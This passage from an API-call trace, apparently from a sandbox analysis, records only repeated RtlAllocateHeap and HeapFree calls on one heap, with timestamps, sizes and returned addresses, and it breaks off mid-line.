0x12dc950 [0117.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dcad0 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbb10 [0117.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcad0 | out: hHeap=0x12c0000) returned 1 [0117.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbb10 | out: hHeap=0x12c0000) returned 1 [0117.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc950 | out: hHeap=0x12c0000) returned 1 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcad0 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1c) returned 0x12dc0c0 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dca58 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbd50 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbb10 [0117.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc0c0 | out: hHeap=0x12c0000) returned 1 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcb00 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc9e0 [0117.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dca58 | out: hHeap=0x12c0000) returned 1 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dca40 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc9f8 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc878 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dc0c0 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc980 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dca88 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcaa0 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dca58 [0117.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc9b0 [0117.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcb30 [0117.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc8d8 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcae8 | out: hHeap=0x12c0000) returned 1 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcad0 | out: hHeap=0x12c0000) returned 1 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc9e0 | out: hHeap=0x12c0000) returned 1 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcb00 | out: hHeap=0x12c0000) returned 1 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dca40 | out: hHeap=0x12c0000) returned 1 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc9f8 | out: hHeap=0x12c0000) returned 1 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc878 | out: hHeap=0x12c0000) returned 1 [0117.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe) returned 0x12dcb48 [0117.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc920 [0117.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbb20 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc920 | out: hHeap=0x12c0000) returned 1 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbb20 | out: hHeap=0x12c0000) returned 1 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcb48 | out: hHeap=0x12c0000) returned 1 [0117.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc8a8 [0117.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcad0 [0117.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc878 [0117.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db970 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc878 | out: hHeap=0x12c0000) returned 1 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db970 | out: hHeap=0x12c0000) returned 1 [0117.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcad0 | out: hHeap=0x12c0000) returned 1 [0117.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcb48 [0117.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1e) returned 0x12dbf58 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc998 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbdf0 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbb20 [0117.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbf58 | out: hHeap=0x12c0000) returned 1 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcad0 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc890 [0117.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc998 | out: hHeap=0x12c0000) returned 1 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc998 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcae8 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc908 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbe18 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc920 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc9e0 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc938 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc950 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc9f8 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dca40 [0117.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcb00 [0117.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc8a8 | out: hHeap=0x12c0000) returned 1 [0117.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcb48 | out: hHeap=0x12c0000) returned 1 [0117.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc890 | out: hHeap=0x12c0000) returned 1 [0117.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcad0 | out: hHeap=0x12c0000) returned 1 [0117.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc998 | out: hHeap=0x12c0000) returned 1 [0117.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcae8 | out: hHeap=0x12c0000) returned 1 [0117.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc908 | out: hHeap=0x12c0000) returned 1 [0117.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe) returned 0x12dcad0 [0117.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dcae8 [0117.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db970 [0117.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcae8 | out: hHeap=0x12c0000) returned 1 [0117.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db970 | out: hHeap=0x12c0000) returned 1 [0117.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcad0 | out: hHeap=0x12c0000) returned 1 [0117.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc998 [0117.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcad0 [0117.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc908 [0117.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db970 [0117.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc908 | out: hHeap=0x12c0000) returned 1 [0117.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db970 | out: hHeap=0x12c0000) returned 1 [0117.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcad0 | out: hHeap=0x12c0000) returned 1 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc908 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1a) returned 0x12dbe40 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dcb48 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbf58 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db970 [0117.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbe40 | out: hHeap=0x12c0000) returned 1 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcad0 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dcae8 [0117.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcb48 | out: hHeap=0x12c0000) returned 1 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcb48 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc860 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc878 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dbee0 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc890 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc8a8 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcb90 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dcb60 [0117.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcc08 [0117.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcc20 [0117.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcb78 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc998 | out: hHeap=0x12c0000) returned 1 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc908 | out: hHeap=0x12c0000) returned 1 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcae8 | out: hHeap=0x12c0000) returned 1 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcad0 | out: hHeap=0x12c0000) returned 1 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcb48 | out: hHeap=0x12c0000) returned 1 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc860 | out: hHeap=0x12c0000) returned 1 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc878 | out: hHeap=0x12c0000) returned 1 [0117.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe) returned 0x12dc908 [0117.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc998 [0117.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db980 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc998 | out: hHeap=0x12c0000) returned 1 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db980 | out: hHeap=0x12c0000) returned 1 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc908 | out: hHeap=0x12c0000) returned 1 [0117.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcb48 [0117.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc998 [0117.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc860 [0117.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db980 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc860 | out: hHeap=0x12c0000) returned 1 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db980 | out: hHeap=0x12c0000) returned 1 [0117.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc998 | out: hHeap=0x12c0000) returned 1 [0117.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc908 [0117.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1e) returned 0x12dbe40 [0117.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dcad0 [0117.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dd118 [0117.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db980 [0117.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbe40 | out: hHeap=0x12c0000) returned 1 [0117.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc998 [0117.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12dc878 [0117.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcad0 | out: hHeap=0x12c0000) returned 1 [0117.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcad0 [0117.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcae8 [0117.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dc860 [0117.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12dcd08 [0117.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12dcba8 [0117.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcb48 | out: hHeap=0x12c0000) returned 1 [0117.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc908 | out: hHeap=0x12c0000) returned 1 [0117.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc878 | out: hHeap=0x12c0000) returned 1 [0117.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc998 | out: hHeap=0x12c0000) returned 1 [0117.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcad0 | out: hHeap=0x12c0000) returned 1 [0117.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcae8 | out: hHeap=0x12c0000) returned 1 [0117.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc860 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc340 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbc80 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc2f8 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc2f8 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbc10 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc370 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12c7788 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc340 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc190 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc2f8 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcb48 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc370 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcad0 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc860 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc878 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd6e0 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbd10 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd728 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd5a8 | out: hHeap=0x12c0000) returned 1 [0117.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbb70 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd6b0 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd578 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd6b0 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd728 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd518 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd6f8 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd638 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd530 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd698 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd4a0 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd4b8 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbca0 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd728 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd728 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbc50 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd470 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12c8578 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd728 | out: hHeap=0x12c0000) returned 1 [0117.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd6f8 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd6b0 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd638 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd560 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd728 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd470 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd4a0 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd590 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbce0 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd560 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd638 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbc50 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd470 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12c8578 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd728 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd590 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd698 | out: hHeap=0x12c0000) returned 1 [0117.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd5a8 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd560 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd5f0 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd6b0 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd5c0 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd590 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbc60 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd560 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd5f0 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbcc0 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd560 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dcf38 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd560 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd590 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd698 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd6b0 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd5a8 | out: hHeap=0x12c0000) returned 1 [0117.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd560 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd5c0 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd5f0 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd6b0 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbc20 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd698 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd5a8 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbc50 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd560 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12c7788 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd560 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd590 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd698 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd6b0 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd5a8 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd560 | out: 